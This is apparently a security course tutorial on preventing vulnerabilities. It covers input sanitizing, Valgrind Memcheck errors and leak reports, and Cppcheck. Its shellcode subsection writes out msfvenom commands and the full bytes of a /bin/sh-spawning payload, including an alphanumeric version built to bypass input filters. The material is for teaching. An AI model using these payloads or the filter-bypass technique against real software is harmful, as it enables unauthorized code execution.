====== 0x0D. Preventing Vulnerabilities ======

===== Slides =====

<note warning>
TODO
</note>

===== Tutorials =====


==== Sanitizing Input ====

Invalid input may cause a program to crash. Input may also carry content crafted to exploit vulnerabilities in a program; one of the best-known examples is [[https://www.owasp.org/index.php/SQL_Injection|SQL injection]]. If the developer doesn't validate input, an SQL ''SELECT'' query may reveal private information to the attacker. Input must be validated to make sure it follows an expected format.

Input validation, or sanitizing, is the process of making sure the input consists only of valid characters or words. It is a preventive measure against would-be attacks: input that isn't sanitized may be used to exploit vulnerabilities in an application.

Consider the case of a web application that receives HTTP queries. A form may require the user to enter an alphanumeric username. The user, however, enters a binary shellcode string and then uses it to exploit a vulnerability in the web application and launch a shell or run a different command. A careful programmer would sanitize the input and make sure the username is alphanumeric. Even so, the check can be bypassed by using an [[http://www.blackhatlibrary.net/Shellcode/Alphanumeric|alphanumeric shellcode]].
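The alphanumeric check described above can be sketched in C as follows. This is a minimal illustration, not code from the lab archive: the function name ''is_alnum_string'' is hypothetical, and the check relies on ''isalnum'' from ''<ctype.h>'' as evaluated in the default C locale.

<code C>
#include <ctype.h>
#include <stddef.h>

/* Hypothetical helper: returns 1 if every character of the NUL-terminated
 * string s is alphanumeric, 0 otherwise (an empty string is rejected). */
int is_alnum_string(const char *s)
{
    if (s == NULL || *s == '\0')
        return 0;
    for (; *s != '\0'; s++) {
        /* Cast to unsigned char: passing a negative char to isalnum is undefined. */
        if (!isalnum((unsigned char)*s))
            return 0;
    }
    return 1;
}
</code>

A caller would reject the request whenever the function returns ''0''. This stops a binary shellcode, but not a shellcode built only from alphanumeric bytes.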

=== Alphanumeric Shellcode ===

An alphanumeric shellcode is a shellcode that consists solely of alphanumeric characters, so it may pass a sanitizing check on a given string. Alphanumeric shellcodes are larger than their binary counterparts because they can only use instructions whose encoding is alphanumeric; for example, they may need a series of increments to bring a register to a certain value.

The Metasploit framework is among the simplest ways of obtaining shellcodes, including alphanumeric ones. Metasploit is already installed on your Kali machines. If manual installation is needed, use the instructions [[http://www.linuxx.eu/2014/01/install-metasploit-on-debian.html|here]] (on Debian-based systems) or [[https://wiki.archlinux.org/index.php/Metasploit_Framework|here]] (Arch).

For example, in order to get an alphanumeric shellcode we would use the [[https://www.offensive-security.com/metasploit-unleashed/msfvenom/|msfvenom]] Metasploit command.

The use of the ''-h'' option provides a list of options for the command:<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: ./msfvenom [options] <var=val>

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message
</code>

In order to list available payloads one would use the command<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -l payloads | head

Framework Payloads (428 total)
==============================

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
</code>

The commands below first generate the raw shellcode that spawns a shell, then the complete alphanumeric version, encoded with ''x86/alpha_mixed'':<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -f python
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 43 bytes
buf =  ""
buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08"
buf += "\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53"
buf += "\x89\xe1\xcd\x80"

student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 148 (iteration=0)
x86/alpha_mixed chosen with final size 148
Payload size: 148 bytes
buf =  ""
buf += "\x89\xe5\xdb\xce\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x62\x4a\x44\x4b\x62"
buf += "\x78\x4d\x49\x51\x42\x65\x36\x43\x58\x56\x4d\x73\x53"
buf += "\x4d\x59\x39\x77\x42\x48\x64\x6f\x61\x63\x31\x78\x37"
buf += "\x70\x61\x78\x46\x4f\x31\x72\x51\x79\x30\x6e\x4b\x39"
buf += "\x6d\x33\x66\x32\x68\x68\x45\x58\x47\x70\x33\x30\x47"
buf += "\x70\x66\x4f\x52\x42\x30\x69\x62\x4e\x36\x4f\x50\x73"
buf += "\x72\x48\x77\x70\x33\x67\x51\x43\x4f\x79\x6d\x31\x48"
buf += "\x4d\x6f\x70\x41\x41"
</code>

As also stated [[http://www.offensive-security.com/metasploit-unleashed/Alphanumeric_Shellcode|here]], if one were to analyze the shellcode, it would show that the first characters aren't alphanumeric:<code>
student@sss-vm:/opt/metasploit-framework.git$ python -c 'buf =  ""
> buf += "\x89\xe5\xdb\xce\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
> buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
> buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
> buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
> buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x62\x4a\x44\x4b\x62"
> buf += "\x78\x4d\x49\x51\x42\x65\x36\x43\x58\x56\x4d\x73\x53"
> buf += "\x4d\x59\x39\x77\x42\x48\x64\x6f\x61\x63\x31\x78\x37"
> buf += "\x70\x61\x78\x46\x4f\x31\x72\x51\x79\x30\x6e\x4b\x39"
> buf += "\x6d\x33\x66\x32\x68\x68\x45\x58\x47\x70\x33\x30\x47"
> buf += "\x70\x66\x4f\x52\x42\x30\x69\x62\x4e\x36\x4f\x50\x73"
> buf += "\x72\x48\x77\x70\x33\x67\x51\x43\x4f\x79\x6d\x31\x48"
> buf += "\x4d\x6f\x70\x41\x41"
> print buf'
�����u�_WYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIbJDKbxMIQBe6CXVMsSMY9wBHdoac1x7paxFO1rQy0nK9m3f2hhEXGp30GpfORB0ibN6OPsrHwp3gQCOym1HMopAA
</code>

This is because the decoder needs a way of computing the current position of the shellcode in memory, and the instructions that do so are not alphanumeric. This may be solved by making a register (such as ECX, for example) point to the beginning of the shellcode buffer. If that is possible in the program, then the shellcode may be instructed to fetch its address from that register:<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python BufferRegister=ECX
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 139 (iteration=0)
x86/alpha_mixed chosen with final size 139
Payload size: 139 bytes
buf =  ""
buf += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
buf += "\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
buf += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x61"
buf += "\x7a\x54\x4b\x56\x38\x7a\x39\x73\x62\x33\x56\x50\x68"
buf += "\x36\x4d\x43\x53\x6b\x39\x4a\x47\x45\x38\x54\x6f\x62"
buf += "\x53\x71\x78\x47\x70\x50\x68\x64\x6f\x73\x52\x72\x49"
buf += "\x32\x4e\x6e\x69\x6b\x53\x61\x42\x4b\x58\x54\x48\x57"
buf += "\x70\x73\x30\x43\x30\x76\x4f\x35\x32\x70\x69\x70\x6e"
buf += "\x44\x6f\x43\x43\x70\x68\x67\x70\x52\x77\x36\x33\x4c"
buf += "\x49\x6b\x51\x5a\x6d\x4f\x70\x41\x41"

student@sss-vm:/opt/metasploit-framework.git$ python -c 'buf =  ""
> buf += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
> buf += "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
> buf += "\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
> buf += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x61"
> buf += "\x7a\x54\x4b\x56\x38\x7a\x39\x73\x62\x33\x56\x50\x68"
> buf += "\x36\x4d\x43\x53\x6b\x39\x4a\x47\x45\x38\x54\x6f\x62"
> buf += "\x53\x71\x78\x47\x70\x50\x68\x64\x6f\x73\x52\x72\x49"
> buf += "\x32\x4e\x6e\x69\x6b\x53\x61\x42\x4b\x58\x54\x48\x57"
> buf += "\x70\x73\x30\x43\x30\x76\x4f\x35\x32\x70\x69\x70\x6e"
> buf += "\x44\x6f\x43\x43\x70\x68\x67\x70\x52\x77\x36\x33\x4c"
> buf += "\x49\x6b\x51\x5a\x6d\x4f\x70\x41\x41"
> print buf'
IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIazTKV8z9sb3VPh6MCSk9JGE8TobSqxGpPhdosRrI2NnikSaBKXTHWps0C0vO52pipnDoCCphgpRw63LIkQZmOpAA
</code>
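The difference between the two encodings can also be checked programmatically. The sketch below counts the non-alphanumeric bytes in a buffer; the helper name ''count_non_alnum'' and the array names are hypothetical, and the two arrays hold only the first 13 bytes of each ''msfvenom'' output shown above.

<code C>
#include <ctype.h>
#include <stddef.h>

/* First 13 bytes of the x86/alpha_mixed output generated without BufferRegister. */
const unsigned char prefix_default[13] = {
    0x89, 0xe5, 0xdb, 0xce, 0xd9, 0x75, 0xf4, 0x5f, 0x57, 0x59, 0x49, 0x49, 0x49
};

/* First 13 bytes of the output generated with BufferRegister=ECX. */
const unsigned char prefix_ecx[13] = {
    0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49
};

/* Hypothetical helper: counts the bytes in buf that are not alphanumeric
 * (as judged by isalnum in the current locale, "C" by default). */
size_t count_non_alnum(const unsigned char *buf, size_t len)
{
    size_t count = 0;
    for (size_t i = 0; i < len; i++) {
        if (!isalnum(buf[i]))
            count++;
    }
    return count;
}
</code>

For the two prefixes above, ''count_non_alnum'' returns ''7'' and ''0'' respectively, which matches the garbled leading characters in the first printout and their absence in the second.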

==== Detecting memory errors with Valgrind ====

Valgrind is a multipurpose code profiling and memory debugging tool for Linux. It allows you to run your program in Valgrind's own environment that monitors memory usage such as calls to malloc and free (or new and delete in C++). If you use uninitialized memory, write off the end of an array, or forget to free a pointer, Valgrind can detect it.

=== Running Valgrind memcheck ===

<code bash>
valgrind --tool=memcheck program_name
...
==18515== malloc/free: in use at exit: 0 bytes in 0 blocks.
==18515== malloc/free: 1 allocs, 1 frees, 10 bytes allocated.
==18515== For a detailed leak analysis,  rerun with: --leak-check=yes
</code>

=== Interpreting errors  ===

Memcheck issues a range of error messages. This section presents a quick summary of what the error messages mean. The precise behaviour of the error-checking machinery is described [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|here]].

== Illegal read / Illegal write errors ==

Take the following error:

<code bash>
Invalid read of size 4
   at 0x40F6BBCC: (within /usr/lib/libpng.so.2.1.0.9)
   by 0x40F6B804: (within /usr/lib/libpng.so.2.1.0.9)
   by 0x40B07FF4: read_png_image(QImageIO *) (kernel/qpngio.cpp:326)
   by 0x40AC751B: QImageIO::read() (kernel/qimage.cpp:3621)
Address 0xBFFFF0E0 is not stack'd, malloc'd or free'd
</code>

This happens when your program reads or writes memory at a place which Memcheck reckons it shouldn't. In this example, the program did a 4-byte read at address 0xBFFFF0E0, somewhere within the system-supplied library libpng.so.2.1.0.9, which was called from somewhere else in the same library, called from line 326 of qpngio.cpp, and so on.

Memcheck tries to establish what the illegal address might relate to, since that's often useful. So, if it points into a block of memory which has already been freed, you'll be informed of this, and also where the block was freed. Likewise, if it should turn out to be just off the end of a heap block, a common result of off-by-one-errors in array subscripting, you'll be informed of this fact, and also where the block was allocated. If you use the **--read-var-info** option Memcheck will run more slowly but may give a more detailed description of any illegal address.

Note that Memcheck only tells you that your program is about to access memory at an illegal address. It can't stop the access from happening. So, if your program makes an access which normally would result in a segmentation fault, your program will still suffer the same fate -- but you will get a message from Memcheck immediately prior to this. In this particular example, reading junk on the stack is non-fatal, and the program stays alive.
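A common source of invalid writes is an allocation that is one byte too small. The sketch below shows the corrected form of such a routine and keeps the faulty allocation in a comment; the function name ''dup_string'' is hypothetical, and the exact Memcheck message for the faulty variant is not reproduced here.

<code C>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: returns a heap copy of s, or NULL on allocation
 * failure. The caller owns the result and must free() it. */
char *dup_string(const char *s)
{
    size_t len = strlen(s);

    /* Off-by-one variant: malloc(len) leaves no room for the terminating
     * NUL, so the copy below would write one byte past the end of the block. */
    char *copy = malloc(len + 1);
    if (copy == NULL)
        return NULL;

    memcpy(copy, s, len + 1);   /* copies the characters and the NUL */
    return copy;
}
</code>

Running the faulty variant under Memcheck is a quick way to see an address reported as lying just past the end of a heap block.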

== Use of uninitialised values ==

<code bash>
Conditional jump or move depends on uninitialised value(s)
   at 0x402DFA94: _IO_vfprintf (_itoa.h:49)
   by 0x402E8476: _IO_printf (printf.c:36)
   by 0x8048472: main (tests/manuel1.c:8)
</code>

An uninitialised-value use error is reported when your program uses a value which hasn't been initialised -- in other words, is undefined. Here, the undefined value is used somewhere inside the printf machinery of the C library. This error was reported when running the following small program:

<code C>
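#include <stdio.h>

int main()
{
  int x;                   /* deliberately left uninitialised */
  printf ("x = %d\n", x);  /* Memcheck complains once printf examines x */
}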
</code>

It is important to understand that your program can copy around junk (uninitialised) data as much as it likes. Memcheck observes this and keeps track of the data, but does not complain. A complaint is issued only when your program attempts to make use of uninitialised data in a way that might affect your program's externally-visible behaviour. In this example, x is uninitialised. Memcheck observes the value being passed to _IO_printf and thence to _IO_vfprintf, but makes no comment. However, _IO_vfprintf has to examine the value of x so it can turn it into the corresponding ASCII string, and it is at this point that Memcheck complains.

Sources of uninitialised data tend to be:
 * Local variables in procedures which have not been initialised, as in the example above.
 * The contents of heap blocks (allocated with malloc, new, or a similar function) before you (or a constructor) write something there.
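Both sources can be avoided by initialising data at the point where it is created. A minimal sketch, assuming the hypothetical helper names ''make_zeroed'' and ''sum_ints'':

<code C>
#include <stdlib.h>

/* Returns a heap array of n ints, all set to zero; calloc initialises
 * the block, whereas malloc would leave its contents undefined. */
int *make_zeroed(size_t n)
{
    return calloc(n, sizeof(int));
}

/* Sums n ints; the accumulator is initialised before it is read. */
int sum_ints(const int *values, size_t n)
{
    int total = 0;
    for (size_t i = 0; i < n; i++)
        total += values[i];
    return total;
}
</code>

With ''malloc'' in place of ''calloc'', or with ''total'' left uninitialised, the result of ''sum_ints'' would depend on undefined data, and Memcheck would be expected to complain at the point where that result is used.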

== Use of uninitialised or unaddressable values in system calls ==

Memcheck checks all parameters to system calls:
 * It checks all the direct parameters themselves, whether they are initialised.
 * If a system call needs to read from a buffer provided by your program, Memcheck checks that the entire buffer is addressable and its contents are initialised.
 *  If the system call needs to write to a user-supplied buffer, Memcheck checks that the buffer is addressable.

After the system call, Memcheck updates its tracked information to precisely reflect any changes in memory state caused by the system call.

Here's an example of two system calls with invalid parameters:
<code C>
#include <stdlib.h>
#include <unistd.h>
int main( void )
{
    char* arr  = malloc(10);
    int*  arr2 = malloc(sizeof(int));
    write( 1 /* stdout */, arr, 10 );
    exit(arr2[0]);
}
</code>

<code bash>
 Syscall param write(buf) points to uninitialised byte(s)
     at 0x25A48723: __write_nocancel (in /lib/tls/libc-2.3.3.so)
     by 0x259AFAD3: __libc_start_main (in /lib/tls/libc-2.3.3.so)
     by 0x8048348: (within /auto/homes/njn25/grind/head4/a.out)
   Address 0x25AB8028 is 0 bytes inside a block of size 10 alloc'd
     at 0x259852B0: malloc (vg_replace_malloc.c:130)
     by 0x80483F1: main (a.c:5)

  Syscall param exit(error_code) contains uninitialised byte(s)
     at 0x25A21B44: __GI__exit (in /lib/tls/libc-2.3.3.so)
     by 0x8048426: main (a.c:8)
</code>

The program has (a) written uninitialised junk from the heap block to the standard output, and (b) passed an uninitialised value to exit. Note that the first error refers to the memory pointed to by buf (not buf itself), but the second error refers directly to exit's argument arr2[0].

== Illegal frees ==

<code bash>
Invalid free()
   at 0x4004FFDF: free (vg_clientmalloc.c:577)
   by 0x80484C7: main (tests/doublefree.c:10)
 Address 0x3807F7B4 is 0 bytes inside a block of size 177 free'd
   at 0x4004FFDF: free (vg_clientmalloc.c:577)
   by 0x80484C7: main (tests/doublefree.c:10)
</code>

Memcheck keeps track of the blocks allocated by your program with malloc/new, so it knows exactly whether the argument to free/delete is legitimate. Here, the test program has freed the same block twice. As with the illegal read/write errors, Memcheck attempts to make sense of the address freed. If, as here, the address is one which has previously been freed, you will be told that, which makes duplicate frees of the same block easy to spot. You will also get this message if you try to free a pointer that doesn't point to the start of a heap block.
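One defensive idiom against double frees is to clear the pointer right after freeing it, since ''free(NULL)'' is defined to do nothing. A sketch, with the hypothetical helper name ''release'':

<code C>
#include <stdlib.h>

/* Hypothetical helper: frees *ptr and resets it to NULL, so that calling
 * release() again on the same variable is harmless. */
void release(char **ptr)
{
    if (ptr == NULL)
        return;
    free(*ptr);
    *ptr = NULL;
}
</code>

This only protects the pointer variable that is passed in. Other copies of the same address can still be freed twice, which is where Memcheck remains useful.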

== When a heap block is freed with an inappropriate deallocation function ==
In the following example, a block allocated with new[] has wrongly been deallocated with free:

<code bash>
Mismatched free() / delete / delete []
   at 0x40043249: free (vg_clientfuncs.c:171)
   by 0x4102BB4E: QGArray::~QGArray(void) (tools/qgarray.cpp:149)
   by 0x4C261C41: PptDoc::~PptDoc(void) (include/qmemarray.h:60)
   by 0x4C261F0E: PptXml::~PptXml(void) (pptxml.cc:44)
 Address 0x4BB292A8 is 0 bytes inside a block of size 64 alloc'd
   at 0x4004318C: operator new[](unsigned int) (vg_clientfuncs.c:152)
   by 0x4C21BC15: KLaola::readSBStream(int) const (klaola.cc:314)
   by 0x4C21C155: KLaola::stream(KLaola::OLENode const *) (klaola.cc:416)
   by 0x4C21788F: OLEFilter::convert(QCString const &) (olefilter.cc:272)
</code>

In C++ it's important to deallocate memory in a way compatible with how it was allocated. The deal is:

 * If allocated with malloc, calloc, realloc, valloc or memalign, you must deallocate with free.

 * If allocated with new, you must deallocate with delete.

 * If allocated with new[], you must deallocate with delete[].

The reason behind the requirement is as follows. In some C++ implementations, delete[] must be used for objects allocated by new[] because the compiler stores the size of the array and the pointer-to-member to the destructor of the array's content just before the pointer actually returned. delete doesn't account for this and will get confused, possibly corrupting the heap.

== Overlapping source and destination blocks ==
The following C library functions copy some data from one memory block to another (or something similar): memcpy, strcpy, strncpy, strcat, strncat. The blocks pointed to by their src and dst pointers aren't allowed to overlap. The POSIX standards have wording along the lines of "If copying takes place between objects that overlap, the behavior is undefined." Therefore, Memcheck checks for this.

<code bash>
==27492== Source and destination overlap in memcpy(0xbffff294, 0xbffff280, 21)
==27492==    at 0x40026CDC: memcpy (mc_replace_strmem.c:71)
==27492==    by 0x804865A: main (overlap.c:40)
</code>

You don't want the two blocks to overlap because one of them could get partially overwritten by the copying.
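When the two ranges may overlap, ''memmove'' is the standard C function that handles the copy correctly. A sketch, with the hypothetical helper name ''shift_left'':

<code C>
#include <string.h>

/* Hypothetical helper: drops the first n bytes of buf by moving the
 * remaining len - n bytes to the front. Source and destination overlap,
 * so memmove is used instead of memcpy. Does nothing if n > len. */
void shift_left(char *buf, size_t len, size_t n)
{
    if (n > len)
        return;
    memmove(buf, buf + n, len - n);
}
</code>

For instance, calling ''shift_left(s, sizeof s, 6)'' on ''char s[] = "hello world"'' leaves the string ''world'' in ''s'', because the terminating NUL is part of the moved range.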

== Memory leak detection ==

Memcheck keeps track of all heap blocks issued in response to calls to malloc/new et al. So when the program exits, it knows which blocks have not been freed.

If ''%%--leak-check%%'' is set appropriately, for each remaining block, Memcheck determines if the block is reachable from pointers within the root-set. The root-set consists of (a) general purpose registers of all threads, and (b) initialised, aligned, pointer-sized data words in accessible client memory, including stacks.

There are two ways a block can be reached. The first is with a "start-pointer", i.e. a pointer to the start of the block. The second is with an "interior-pointer", i.e. a pointer to the middle of the block. There are several ways we know of that an interior-pointer can occur:
 * The pointer might have originally been a start-pointer and have been moved along deliberately (or not deliberately) by the program. In particular, this can happen if your program uses tagged pointers, i.e. if it uses the bottom one, two or three bits of a pointer, which are normally always zero due to alignment, in order to store extra information.
 * It might be a random junk value in memory, entirely unrelated, just a coincidence.
 * It might be a pointer to an array of C++ objects (which possess destructors) allocated with new[]. In this case, some compilers store a "magic cookie" containing the array length at the start of the allocated block, and return a pointer to just past that magic cookie, i.e. an interior-pointer.
 * It might be a pointer to the inner char array of a C++ std::string. For example, some compilers add 3 words at the beginning of the std::string to store the length, the capacity and a reference count before the memory containing the array of characters. They return a pointer just after these 3 words, pointing at the char array.
 * It might be a pointer to an inner part of a C++ object using multiple inheritance.

You can optionally activate heuristics to use during the leak search to detect the interior pointers corresponding to the newarray, stdstring and multipleinheritance cases. If the heuristic detects that an interior pointer corresponds to such a case, the block will be considered as reachable by the interior pointer. In other words, the interior pointer will be treated as if it were a start pointer.

With that in mind, consider the nine possible cases described by the following figure.

<code>
     Pointer chain            AAA Leak Case   BBB Leak Case
     -------------            -------------   -------------
(1)  RRR ------------> BBB                    DR
(2)  RRR ---> AAA ---> BBB    DR              IR
(3)  RRR               BBB                    DL
(4)  RRR      AAA ---> BBB    DL              IL
(5)  RRR ------?-----> BBB                    (y)DR, (n)DL
(6)  RRR ---> AAA -?-> BBB    DR              (y)IR, (n)DL
(7)  RRR -?-> AAA ---> BBB    (y)DR, (n)DL    (y)IR, (n)IL
(8)  RRR -?-> AAA -?-> BBB    (y)DR, (n)DL    (y,y)IR, (n,y)IL, (_,n)DL
(9)  RRR      AAA -?-> BBB    DL              (y)IL, (n)DL

Pointer chain legend:
- RRR: a root set node or DR block
- AAA, BBB: heap blocks
- --->: a start-pointer
- -?->: an interior-pointer

Leak Case legend:
- DR: Directly reachable
- IR: Indirectly reachable
- DL: Directly lost
- IL: Indirectly lost
- (y)XY: it's XY if the interior-pointer is a real pointer
- (n)XY: it's XY if the interior-pointer is not a real pointer
- (_)XY: it's XY in either case
</code>

Every possible case can be reduced to one of the above nine. Memcheck merges some of these cases in its output, resulting in the following four leak kinds.

 * **Still reachable**. This covers cases 1 and 2 (for the BBB blocks) above. A start-pointer or chain of start-pointers to the block is found. Since the block is still pointed at, the programmer could, at least in principle, have freed it before program exit. "Still reachable" blocks are very common and arguably not a problem. So, by default, Memcheck won't report such blocks individually.

 * **Definitely lost**. This covers case 3 (for the BBB blocks) above. This means that no pointer to the block can be found. The block is classified as "lost", because the programmer could not possibly have freed it at program exit, since no pointer to it exists. This is likely a symptom of having lost the pointer at some earlier point in the program. Such cases should be fixed by the programmer.

 * **Indirectly lost**. This covers cases 4 and 9 (for the BBB blocks) above. This means that the block is lost, not because there are no pointers to it, but rather because all the blocks that point to it are themselves lost. For example, if you have a binary tree and the root node is lost, all its children nodes will be indirectly lost. Because the problem will disappear if the definitely lost block that caused the indirect leak is fixed, Memcheck won't report such blocks individually by default.

 * **Possibly lost**. This covers cases 5--8 (for the BBB blocks) above. This means that a chain of one or more pointers to the block has been found, but at least one of the pointers is an interior-pointer. This could just be a random value in memory that happens to point into a block, and so you shouldn't consider this ok unless you know you have interior-pointers.

Furthermore, if a suppression exists for a block, it will be reported as "suppressed" no matter which of the above four kinds it belongs to.

The following is an example leak summary.

<code>
LEAK SUMMARY:
   definitely lost: 48 bytes in 3 blocks.
   indirectly lost: 32 bytes in 2 blocks.
     possibly lost: 96 bytes in 6 blocks.
   still reachable: 64 bytes in 4 blocks.
        suppressed: 0 bytes in 0 blocks.
</code>

If heuristics have been used to consider some blocks as reachable, the leak summary details the heuristically reachable subset of 'still reachable:' per heuristic. In the example below, of the 79 bytes still reachable, 71 bytes (56+7+8) have been considered heuristically reachable.

<code>
LEAK SUMMARY:
   definitely lost: 4 bytes in 1 blocks
   indirectly lost: 0 bytes in 0 blocks
     possibly lost: 0 bytes in 0 blocks
   still reachable: 79 bytes in 5 blocks
                      of which reachable via heuristic:
                        stdstring          : 56 bytes in 2 blocks
                        newarray           : 7 bytes in 1 blocks
                        multipleinheritance: 8 bytes in 1 blocks
        suppressed: 0 bytes in 0 blocks
</code>

If ''%%--leak-check=full%%'' is specified, Memcheck will give details for each definitely lost or possibly lost block, including where it was allocated. (Actually, it merges results for all blocks that have the same leak kind and sufficiently similar stack traces into a single "loss record". The ''%%--leak-resolution%%'' CLI option lets you control the meaning of "sufficiently similar".) 
It cannot tell you when or how or why the pointer to a leaked block was lost; you have to work that out for yourself. In general, you should attempt to ensure your programs do not have any definitely lost or possibly lost blocks at exit.

For example:

<code>
8 bytes in 1 blocks are definitely lost in loss record 1 of 14
   at 0x........: malloc (vg_replace_malloc.c:...)
   by 0x........: mk (leak-tree.c:11)
   by 0x........: main (leak-tree.c:39)

88 (8 direct, 80 indirect) bytes in 1 blocks are definitely lost in loss record 13 of 14
   at 0x........: malloc (vg_replace_malloc.c:...)
   by 0x........: mk (leak-tree.c:11)
   by 0x........: main (leak-tree.c:25)
</code>

The first message describes a simple case of a single 8 byte block that has been definitely lost. The second case mentions another 8 byte block that has been definitely lost; the difference is that a further 80 bytes in other blocks are indirectly lost because of this lost block. The loss records are not presented in any notable order, so the loss record numbers aren't particularly meaningful. The loss record numbers can be used in the Valgrind gdbserver to list the addresses of the leaked blocks and/or give more details about how a block is still reachable.
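The binary tree case mentioned earlier can be sketched as follows. Losing the pointer to the root, or freeing only the root, would leave the children indirectly lost; a recursive release avoids that. The type ''struct node'' and the helpers ''node_new'' and ''tree_free'' are hypothetical and are not taken from ''leak-tree.c''.

<code C>
#include <stdlib.h>

struct node {
    struct node *left;
    struct node *right;
};

/* Allocates a node that takes ownership of the two subtrees.
 * Returns NULL on allocation failure. */
struct node *node_new(struct node *left, struct node *right)
{
    struct node *n = malloc(sizeof *n);
    if (n == NULL)
        return NULL;
    n->left = left;
    n->right = right;
    return n;
}

/* Frees the whole tree, children first, and returns the number of
 * nodes that were freed. */
size_t tree_free(struct node *root)
{
    if (root == NULL)
        return 0;
    size_t freed = tree_free(root->left) + tree_free(root->right);
    free(root);
    return freed + 1;
}
</code>

Replacing the call to ''tree_free'' with a plain ''free(root)'' is an easy way to reproduce a loss record with both direct and indirect bytes under ''%%--leak-check=full%%''.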

==== Static Analysis ====

Static analysis can be done using a variety of tools, ranging from ''lint''-like analyzers to software suites that attempt to do full semantic analysis on the code. Wikipedia gives a comprehensive [[https://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis|list of static code analysis tools]] for various programming languages. One such useful tool is [[http://cppcheck.sourceforge.net/|Cppcheck]], which has been used to discover a [[http://tech.slashdot.org/story/14/01/08/1421235/23-year-old-x11-server-security-vulnerability-discovered|23-year-old vulnerability]] in the X11 server.

Cppcheck is oriented towards C and C++. It can check basic errors related to the usage of C Standard Library and C++ STL functions, but it can also be extended to other external library functions through so-called library files. Some examples of basic Cppcheck usages are:

<code>
$ cppcheck --enable=all somefile.c # enable all checks
$ cppcheck --enable=all --library=mylib.cfg somefile.c # load an additional library file
</code>

Library files are XML files defined in the [[http://cppcheck.sourceforge.net/#documentation|Cppcheck manual]]. Their basic format is:

<code xml>
<?xml version="1.0"?>
<def>
	<function name="myfunc">
	<arg nr="1">
	<!-- constraints go here -->
		...
	</arg>
	</function>
</def>
</code>

<note>The ''cppcheck'' package in Kali Linux currently contains Cppcheck version 1.74; alternatively, you can download the latest Cppcheck sources from [[http://sourceforge.net/projects/cppcheck/files/cppcheck|Sourceforge]] and compile them by simply running ''make''.</note>

